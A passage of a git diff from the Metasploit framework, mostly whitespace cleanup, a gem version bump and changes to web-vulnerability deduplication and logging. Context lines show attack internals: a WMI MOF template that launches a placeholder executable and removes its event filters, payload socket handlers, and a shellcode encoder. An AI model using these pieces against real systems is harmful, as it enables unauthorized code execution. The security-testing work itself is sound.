lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_sites.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_vulns.rb similarity index 92% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_vulns.rb index 4bba254c7b..308a52a98f 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_vulns.rb @@ -25,8 +25,8 @@ FactoryGirl.define do end sequence :mdm_web_vuln_confidence do |n| - # range is from 1 to 100 so do mod 99 (0 - 99 range) and add 1 to get correct range - (n % 99) + 1 + # range is from 0 to 100 + n % 101 end method_count = Mdm::WebVuln::METHODS.length diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/spec_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/spec_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.2.gemspec similarity index 97% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.2.gemspec index 4a19d34025..ae4c2d7b8f 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.2.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.6.0" + s.version = "0.6.2" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2013-03-06" + s.date = "2013-03-08" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 2d8c98acba..60f50f4a45 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -88,7 +88,7 @@ class Config < Hash def self.module_directory self.new.module_directory end - + # # Calls the instance method. # @@ -144,7 +144,7 @@ class Config < Hash def self.user_module_directory self.new.user_module_directory end - + # # Calls the instance method. # @@ -235,7 +235,7 @@ class Config < Hash def module_directory install_root + FileSep + self['ModuleDirectory'] end - + # # Returns the path that scripts can be loaded from. # @@ -284,7 +284,7 @@ class Config < Hash def user_module_directory config_directory + FileSep + "modules" end - + # # Returns the user-specific plugin base path # diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb index 1eada62e93..ed9d7dafbb 100644 --- a/lib/msf/base/simple/auxiliary.rb +++ b/lib/msf/base/simple/auxiliary.rb @@ -77,7 +77,7 @@ module Auxiliary Proc.new { |ctx_| self.job_cleanup_proc(ctx_) } ) # Propagate this back to the caller for console mgmt - omod.job_id = mod.job_id + omod.job_id = mod.job_id else self.job_run_proc(ctx) self.job_cleanup_proc(ctx) diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb index c92153ab71..c8ac7ab49a 100644 --- a/lib/msf/base/simple/framework.rb +++ b/lib/msf/base/simple/framework.rb @@ -167,7 +167,7 @@ module Framework if (Msf::Config.module_directory) self.modules.add_module_path(Msf::Config.module_directory) end - + # Initialize the user module search path if (Msf::Config.user_module_directory) self.modules.add_module_path(Msf::Config.user_module_directory) diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 5cbaf19efa..21516099e7 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -41,7 +41,7 @@ require 'msf/core/session' require 'msf/core/session_manager' - + # Wrappers require 'msf/core/encoded_payload' diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 3c83af5f9a..dd234103e4 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -160,8 +160,8 @@ module Auxiliary::Web vhash = [target.to_url, opts[:fingerprint], mode, opts[:location]]. map { |x| x.to_s }.join( '|' ).hash - return if parent.vulns.include?( vhash ) - parent.vulns[vhash] = true + parent.vulns[mode] ||= {} + return if parent.vulns[mode].include?( vhash ) location = opts[:location] ? page.url.merge( URI( opts[:location].to_s )) : page.url @@ -183,6 +183,7 @@ module Auxiliary::Web } info[:confidence] = calculate_confidence( info ) + parent.vulns[mode][vhash] = info report_web_vuln( info ) @@ -195,8 +196,8 @@ module Auxiliary::Web vhash = [target.to_url, mode, opts[:location]]. map { |x| x.to_s }.join( '|' ).hash - return if parent.vulns.include?( vhash ) - parent.vulns[vhash] = true + parent.vulns[mode] ||= {} + return if parent.vulns[mode].include?( vhash ) location = URI( opts[:location].to_s ) info = { @@ -216,6 +217,7 @@ module Auxiliary::Web } info[:confidence] = calculate_confidence( info ) + parent.vulns[mode][vhash] = info report_web_vuln( info ) @@ -237,7 +239,7 @@ module Auxiliary::Web :params => element.params.to_a, :mode => mode, :pname => element.altered, - :proof => proof, + :proof => proof.to_s, :form => element.model, :risk => details[:risk], :name => details[:name], @@ -266,7 +268,7 @@ module Auxiliary::Web :method => element.method.to_s.upcase, :params => element.params.to_a, :pname => element.altered, - :proof => proof, + :proof => proof.to_s, :risk => details[:risk], :name => details[:name], :blame => details[:blame], diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 166370abbc..789c8233c8 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -67,6 +67,7 @@ class Auxiliary::Web::HTTP attr_reader :opts attr_reader :headers attr_reader :framework + attr_reader :parent attr_accessor :redirect_limit attr_accessor :username , :password @@ -75,6 +76,7 @@ class Auxiliary::Web::HTTP @opts = opts.dup @framework = opts[:framework] + @parent = opts[:parent] @headers = { 'Accept' => '*/*', @@ -130,8 +132,8 @@ class Auxiliary::Web::HTTP begin request.handle_response request( request.url, request.opts ) rescue => e - elog e.to_s - e.backtrace.each { |l| elog l } + print_error e.to_s + e.backtrace.each { |l| print_error l } end end end @@ -250,6 +252,11 @@ class Auxiliary::Web::HTTP private + def print_error( message ) + return if !@parent + @parent.print_error message + end + def call_after_run_blocks while block = @after_run_blocks.pop block.call diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 38b48c644e..73c38d73e9 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -288,7 +288,7 @@ class ModuleDataStore < DataStore val = super if val.nil? val end - + # # Was this entry actually set or just using its default # diff --git a/lib/msf/core/db_export.rb b/lib/msf/core/db_export.rb index 8eafe84ac4..effa7ff813 100644 --- a/lib/msf/core/db_export.rb +++ b/lib/msf/core/db_export.rb @@ -376,17 +376,17 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") - + # Refs sub-elements report_file.write(" \n") m.refs.find(:all).each do |d| d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -397,7 +397,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -408,7 +408,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -419,7 +419,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -429,7 +429,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -439,7 +439,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -468,7 +468,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - report_file.write(" \n") + report_file.write(" \n") end report_file.write(" \n") @@ -479,7 +479,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end report_file.write(" \n") end report_file.write(" \n") @@ -516,7 +516,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - + # References report_file.write(" \n") e.refs.each do |ref| @@ -534,7 +534,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - report_file.write(" \n") + report_file.write(" \n") end report_file.write(" \n") @@ -547,7 +547,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - report_file.write(" \n") + report_file.write(" \n") end report_file.write(" \n") diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 726eb682f7..5a916ef389 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -485,14 +485,14 @@ class DBManager m.targets.each_index do |i| bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ] - if m.targets[i].platform + if m.targets[i].platform m.targets[i].platform.platforms.each do |name| - bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ] - end - end + bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ] + end + end if m.targets[i].arch bits << [ :arch, { :name => m.targets[i].arch.to_s } ] - end + end end if (m.default_target) diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index d5c481e7ce..2cdf6a66a1 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -147,7 +147,7 @@ class EncodedPayload 'core', LEV_1) next end - + # Import the datastore from payload (and likely exploit by proxy) self.encoder.share_datastore(pinst.datastore) @@ -276,7 +276,7 @@ class EncodedPayload nops.each { |nopname, nopmod| # Create an instance of the nop module self.nop = nopmod.new - + # Propagate options from the payload and possibly exploit self.nop.share_datastore(pinst.datastore) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 6d2afc913d..e059d0999b 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -32,7 +32,7 @@ class Exploit < Msf::Module ## - # Exceptions + # Exceptions ## # Indicate that the exploit should abort because it has completed @@ -1292,7 +1292,7 @@ class Exploit < Msf::Module ## # Failure tracking ## - + def fail_with(reason,msg=nil) self.fail_reason = reason self.fail_detail = msg diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb index dc12ddcb92..51fde88437 100644 --- a/lib/msf/core/exploit/capture.rb +++ b/lib/msf/core/exploit/capture.rb @@ -100,11 +100,11 @@ module Exploit::Capture self.capture = ::Pcap.open_offline(cap) else dev ||= ::Pcap.lookupdev - + unless RUBY_PLATFORM == "i386-mingw32" system("ifconfig", dev, "up") end - + self.capture = ::Pcap.open_live(dev, len, true, tim) if arp self.arp_capture = ::Pcap.open_live(dev, 512, true, tim) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 8cb75c490a..b8bdf3ca59 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -184,8 +184,8 @@ module Exploit::Remote::HttpServer uopts = { 'Proc' => Proc.new { |cli, req| self.cli = cli - ( self.respond_to?(:filter_request_uri) && - filter_request_uri(cli, req) + ( self.respond_to?(:filter_request_uri) && + filter_request_uri(cli, req) ) ? nil : on_request_uri(cli, req) }, 'Path' => resource_uri diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb index 400dba11cc..62ec63fa22 100644 --- a/lib/msf/core/exploit/mssql_sqli.rb +++ b/lib/msf/core/exploit/mssql_sqli.rb @@ -137,7 +137,7 @@ module Exploit::Remote::MSSQL_SQLI # Issue a SQL query using the the SQL injection point # def mssql_query(sqla, doprint=false) - + if (doprint) print_status(sqla) end diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb index 1961b8c1f3..660d29f45d 100644 --- a/lib/msf/core/exploit/wbemexec.rb +++ b/lib/msf/core/exploit/wbemexec.rb @@ -52,7 +52,7 @@ Instance of ActiveScriptEventConsumer as $cons Name = "ASEC"; ScriptingEngine = "JScript"; ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"@EXE@\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass@CLASS@\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};"; - + }; Instance of ActiveScriptEventConsumer as $cons2 { @@ -64,14 +64,14 @@ instance of __EventFilter as $Filt { Name = "instfilt"; Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass@CLASS@\\""; - QueryLanguage = "WQL"; + QueryLanguage = "WQL"; }; instance of __EventFilter as $Filt2 { Name = "qndfilt"; Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\"Win32_Process\\" AND TargetInstance.Name = \\"@EXE@\\""; QueryLanguage = "WQL"; - + }; instance of __FilterToConsumerBinding as $bind { diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb index 6cb179e64b..be5be42b0e 100644 --- a/lib/msf/core/exploit_driver.rb +++ b/lib/msf/core/exploit_driver.rb @@ -204,7 +204,7 @@ protected # Launch the exploit exploit.exploit - + rescue ::Exception => e @@ -217,7 +217,7 @@ protected msg = "#{e}" unless e.class == Msf::Exploit::Failed msg = "#{e.class} #{e}" - end + end exploit.error = e @@ -231,7 +231,7 @@ protected when Msf::Exploit::Failed exploit.print_error("Exploit aborted due to failure: #{exploit.fail_reason}: #{msg}") - + # The caller should have already set exploit.fail_reason if exploit.fail_reason == Msf::Exploit::Failure::None exploit.fail_reason = Msf::Exploit::Failure::Unknown @@ -249,7 +249,7 @@ protected elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0) dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3) else - + # Compare as a string since not all error classes may be loaded case msg when /access.denied|Login Failed/i # Covers SMB as well as some generic errors diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index 99050a6cb5..941dcad94d 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -301,7 +301,7 @@ class FrameworkEventSubscriber # def session_event(name, session, opts={}) address = session.session_host - + if not (address and address.length > 0) elog("Session with no session_host/target_host/tunnel_peer") dlog("#{session.inspect}", LEV_3) diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index 297276288c..ba47410988 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -161,15 +161,15 @@ module BindTcp if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" return sock end - + socks = Rex::Socket::tcp_socket_pair() socks[0].extend(Rex::Socket::Tcp) socks[1].extend(Rex::Socket::Tcp) - + m = OpenSSL::Digest::Digest.new('md5') m.reset key = m.digest(datastore["AESPassword"] || "") - + Rex::ThreadFactory.spawn('AESEncryption', false) { c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') c1.encrypt @@ -183,7 +183,7 @@ module BindTcp end sock.close() } - + Rex::ThreadFactory.spawn('AESEncryption', false) { c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') c2.decrypt @@ -200,7 +200,7 @@ module BindTcp end socks[0].close() } - + return socks[1] end diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 086a1b4b28..353d111af0 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -171,20 +171,20 @@ module ReverseTcp } end - + def wrap_aes_socket(sock) if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" return sock end - + socks = Rex::Socket::tcp_socket_pair() socks[0].extend(Rex::Socket::Tcp) socks[1].extend(Rex::Socket::Tcp) - + m = OpenSSL::Digest::Digest.new('md5') m.reset key = m.digest(datastore["AESPassword"] || "") - + Rex::ThreadFactory.spawn('AESEncryption', false) { c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') c1.encrypt diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 40581a6e32..a62a8c12be 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -391,7 +391,7 @@ class Module nil end - + # # Returns the current workspace # @@ -617,7 +617,7 @@ class Module def debugging? (datastore['DEBUG'] || '') =~ /^(1|t|y)/i end - + # # Indicates whether the module supports IPv6. This is true by default, # but certain modules require additional work to be compatible or are diff --git a/lib/msf/core/patches/active_record.rb b/lib/msf/core/patches/active_record.rb index 6e8fa74070..9376b81e59 100644 --- a/lib/msf/core/patches/active_record.rb +++ b/lib/msf/core/patches/active_record.rb @@ -7,7 +7,7 @@ class ConnectionPool # XXX: This fixes the logic around whether a connection allocated is "fresh" # AR incorrectly assumed that if any connection was established, it should # no longer free the allocated connection. - + # Check to see if there is an active thread connection def active_thread_connection?(with_id = current_connection_id) @reserved_connections.has_key?(with_id) @@ -77,12 +77,12 @@ class ConnectionPool raise ConnectionTimeoutError, "could not obtain a database connection#{" within #{@timeout} seconds" if @timeout}. The max pool size is currently #{@size}; consider increasing it or the wait_timeout parameter" end end - end + end end - end - - - + end + + + end end end diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index 3a763f6c4d..f923b29ee0 100644 --- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb @@ -81,7 +81,7 @@ module Common end # - # Reports to the database that the host is a virtual machine and reports + # Reports to the database that the host is a virtual machine and reports # the type of virtual machine it is (e.g VirtualBox, VMware, Xen) # def report_vm(vm) diff --git a/lib/msf/core/post/windows/cli_parse.rb b/lib/msf/core/post/windows/cli_parse.rb index 108086ef73..419d2e3e81 100644 --- a/lib/msf/core/post/windows/cli_parse.rb +++ b/lib/msf/core/post/windows/cli_parse.rb @@ -14,7 +14,7 @@ module CliParse class ParseError < ArgumentError # - # Create a new ParseError object. Expects a method name, an error + # Create a new ParseError object. Expects a method name, an error # message, an error code, and the command that caused the error. # def initialize(method, einfo='', ecode=nil, clicmd=nil) diff --git a/lib/msf/core/post/windows/eventlog.rb b/lib/msf/core/post/windows/eventlog.rb index 6bbf0bc7e7..60c734fea1 100644 --- a/lib/msf/core/post/windows/eventlog.rb +++ b/lib/msf/core/post/windows/eventlog.rb @@ -20,7 +20,7 @@ module Eventlog end # - # Clears a given eventlog or all eventlogs if none is given. Returns an array of eventlogs + # Clears a given eventlog or all eventlogs if none is given. Returns an array of eventlogs # that where cleared. # def eventlog_clear(evt = "") diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index 38b3909543..405b35e8f6 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -131,8 +131,8 @@ module Powershell # - # Powershell scripts that are longer than 8000 bytes are split into 8000 - # 8000 byte chunks and stored as environment variables. A new powershell + # Powershell scripts that are longer than 8000 bytes are split into 8000 + # 8000 byte chunks and stored as environment variables. A new powershell # script is built that will reassemble the chunks and execute the script. # Returns the reassembly script. # diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb index bb77e8c9b2..c3f0af50dc 100644 --- a/lib/msf/core/post/windows/registry.rb +++ b/lib/msf/core/post/windows/registry.rb @@ -323,7 +323,7 @@ protected end # - # Enumerate the type and data stored in the registry value +valname+ in + # Enumerate the type and data stored in the registry value +valname+ in # +key+ # def shell_registry_getvalinfo(key, valname) diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb index cfa76ec087..e5e1e5215f 100644 --- a/lib/msf/core/post/windows/shadowcopy.rb +++ b/lib/msf/core/post/windows/shadowcopy.rb @@ -13,7 +13,7 @@ module ShadowCopy include Msf::Post::Windows::Services # - # Get the device name for the shadow copy, which is used when accessing + # Get the device name for the shadow copy, which is used when accessing # files on the volume. # def get_vss_device(id) @@ -44,7 +44,7 @@ module ShadowCopy # # Get volume shadow storage parameters. - # + # def vss_get_storage storage={} storage['AllocatedSpace'] = vss_get_storage_param('AllocatedSpace') @@ -84,7 +84,7 @@ module ShadowCopy end # - # Return the value of the +param_name+ for the volume shadow copy + # Return the value of the +param_name+ for the volume shadow copy # specified by +id+ # def get_sc_param(id,param_name) @@ -94,7 +94,7 @@ module ShadowCopy end # - # Return the value of the shadowstorage parameter specified by + # Return the value of the shadowstorage parameter specified by # +param_name+ # def vss_get_storage_param(param_name) diff --git a/lib/msf/core/post/windows/user_profiles.rb b/lib/msf/core/post/windows/user_profiles.rb index 1a8c60f129..3f8b8485d8 100644 --- a/lib/msf/core/post/windows/user_profiles.rb +++ b/lib/msf/core/post/windows/user_profiles.rb @@ -11,8 +11,8 @@ module UserProfiles include Msf::Post::Windows::Accounts # - # Load the registry hive for each user on the machine and parse out the - # user profile information. Next, unload the hives we loaded and return + # Load the registry hive for each user on the machine and parse out the + # user profile information. Next, unload the hives we loaded and return # the user profiles. # def grab_user_profiles @@ -89,7 +89,7 @@ module UserProfiles end # - # Read HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList to + # Read HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList to # get a list of user profiles on the machine. # def read_profile_list diff --git a/lib/msf/core/rpc/v10/service.rb b/lib/msf/core/rpc/v10/service.rb index 3ff567ec67..b72b807d47 100644 --- a/lib/msf/core/rpc/v10/service.rb +++ b/lib/msf/core/rpc/v10/service.rb @@ -199,7 +199,7 @@ class Service def authenticate(token) stale = [] - + if not (token and token.kind_of?(::String)) return false end diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb index 4f3e025e73..0660f28f57 100644 --- a/lib/msf/core/session.rb +++ b/lib/msf/core/session.rb @@ -144,7 +144,7 @@ module Session # def tunnel_peer end - + # # Returns the host associated with the session # @@ -152,7 +152,7 @@ module Session # Prefer the overridden session host or target_host host = @session_host || self.target_host return host if host - + # Fallback to the tunnel_peer (contains port) peer = self.tunnel_peer return if not peer @@ -162,14 +162,14 @@ module Session bits.pop bits.join(':') end - + # # Override the host associated with this session # def session_host=(v) @session_host = v end - + # # Returns the port associated with the session # @@ -185,14 +185,14 @@ module Session port = bits.pop port.to_i end - + # # Override the host associated with this session # def session_port=(v) @session_port = v end - + # # Returns a pretty representation of the tunnel. # diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 84d2bece5a..5af15c0f85 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -57,7 +57,7 @@ if(RUBY_PLATFORM == 'java') trap Signal::list['INT'] do Thread.main.raise Interrupt.new end - + s.close end diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index 5f53bef07e..acbd5bad24 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -34,7 +34,7 @@ module Banner base = File.expand_path(File.dirname(__FILE__)) pathname = File.join(base, "logos", fname) fdata = "<< Missing banner: #{fname} >>" - begin + begin raise ArgumentError unless File.readable?(pathname) raise ArgumentError unless File.stat(pathname).size < 4096 fdata = File.open(pathname) {|f| f.read f.stat.size} diff --git a/lib/rex.rb b/lib/rex.rb index adc93d2535..93efde9c73 100644 --- a/lib/rex.rb +++ b/lib/rex.rb @@ -88,6 +88,10 @@ require 'rex/compat' # Platforms require 'rex/platforms' +# SSLScan +require 'rex/sslscan/scanner' +require 'rex/sslscan/result' + # Overload the Kernel.sleep() function to be thread-safe Kernel.class_eval(" diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb index 64b7d52302..0e3d2fc223 100644 --- a/lib/rex/arch/x86.rb +++ b/lib/rex/arch/x86.rb @@ -23,25 +23,25 @@ module X86 EDI = BH = DI = 7 REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi' ] - + REG_NAMES16 = [ 'ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di' ] - + REG_NAMES8L = [ 'al', 'cl', 'dl', 'bl', nil, nil, nil, nil ] - + # Jump tp a specific register def self.jmp_reg(str) reg = reg_number(str) _check_reg(reg) "\xFF" + [224 + reg].pack('C') end - + # # Generate a LOOP instruction (Decrement ECX and jump short if ECX == 0) # def self.loop(offset) "\xE2" + pack_lsb(rel_number(offset, -2)) end - + # # This method returns the opcodes that compose a jump instruction to the # supplied relative offset. diff --git a/lib/rex/assembly/nasm.rb b/lib/rex/assembly/nasm.rb index c2c35d6859..41a8498a44 100644 --- a/lib/rex/assembly/nasm.rb +++ b/lib/rex/assembly/nasm.rb @@ -44,7 +44,7 @@ class Nasm # Open the temporary file tmp = Tempfile.new('nasmXXXX') tmp.binmode - + tpath = tmp.path opath = tmp.path + '.out' @@ -76,7 +76,7 @@ class Nasm tmp = Tempfile.new('nasmout') tmp.binmode - + tfd = File.open(tmp.path, "wb") tfd.write(raw) diff --git a/lib/rex/encoder/alpha2.rb b/lib/rex/encoder/alpha2.rb index 3a10e9abac..9d9fd51212 100644 --- a/lib/rex/encoder/alpha2.rb +++ b/lib/rex/encoder/alpha2.rb @@ -3,7 +3,7 @@ # # ________________________________________________________________________________ -# +# # ,sSSs,,s, ,sSSSs, ALPHA 2: Zero-tolerance. (build 07) # SS" Y$P" SY" ,SY # iS' dY ,sS" Unicode-proof uppercase alphanumeric shellcode encoding. diff --git a/lib/rex/encoder/alpha2/generic.rb b/lib/rex/encoder/alpha2/generic.rb index 13833d10e4..726fc6f301 100644 --- a/lib/rex/encoder/alpha2/generic.rb +++ b/lib/rex/encoder/alpha2/generic.rb @@ -31,39 +31,39 @@ class Generic def Generic.encode_byte(block, badchars) accepted_chars = default_accepted_chars.dup - + badchars.each_char {|c| accepted_chars.delete(c) } if badchars - + # No, not nipple. nibble_chars = Array.new(0x10) {[]} accepted_chars.each {|c| nibble_chars[c.unpack('C')[0] & 0x0F].push(c) } - + poss_encodings = [] - + block_low_nibble = block & 0x0F block_high_nibble = block >> 4 - + # Get list of chars suitable for expressing lower part of byte first_chars = nibble_chars[block_low_nibble] - + # Build a list of possible encodings first_chars.each do |first_char| first_high_nibble = first_char.unpack('C')[0] >> 4 - + # In the decoding process, the low nibble of the second char gets combined # (either ADDed or XORed depending on the encoder) with the high nibble of the first char, # and we want the high nibble of our input byte to result second_low_nibble = gen_second(block_high_nibble, first_high_nibble) & 0x0F - + # Find valid second chars for this first char and add each combination to our possible encodings second_chars = nibble_chars[second_low_nibble] second_chars.each {|second_char| poss_encodings.push(second_char + first_char) } end - + if poss_encodings.empty? raise RuntimeError, "No encoding of #{"0x%.2X" % block} possible with limited character set" end - + # Return a random encoding poss_encodings[rand(poss_encodings.length)] end diff --git a/lib/rex/encoder/alpha2/unicode_mixed.rb b/lib/rex/encoder/alpha2/unicode_mixed.rb index 5e3dbdd7e3..c91b2de0be 100644 --- a/lib/rex/encoder/alpha2/unicode_mixed.rb +++ b/lib/rex/encoder/alpha2/unicode_mixed.rb @@ -8,12 +8,12 @@ module Encoder module Alpha2 class UnicodeMixed < Generic - + def self.gen_second(block, base) # unicode uses additive encoding (block - base) end - + def self.gen_decoder_prefix(reg, offset) if (offset > 21) raise "Critical: Offset is greater than 21" @@ -27,7 +27,7 @@ class UnicodeMixed < Generic mod = 'AA' * (offset - 14) # inc ecx nop = 'CP' * (14 - mod.length) mod += nop - end + end regprefix = { # nops ignored below 'EAX' => 'PPYA' + mod, # push eax, pop ecx 'ECX' => mod + "4444", # dec ecx @@ -91,7 +91,7 @@ class UnicodeMixed < Generic "1A" + # add [ecx], dh NOP "IA" + # dec ecx, NOP "J" + # dec edx - "Q" + # add [ecx], dl + "Q" + # add [ecx], dl "YA" + # pop ecx, NOP "Z" + # pop edx "B" + # add [edx], al @@ -105,10 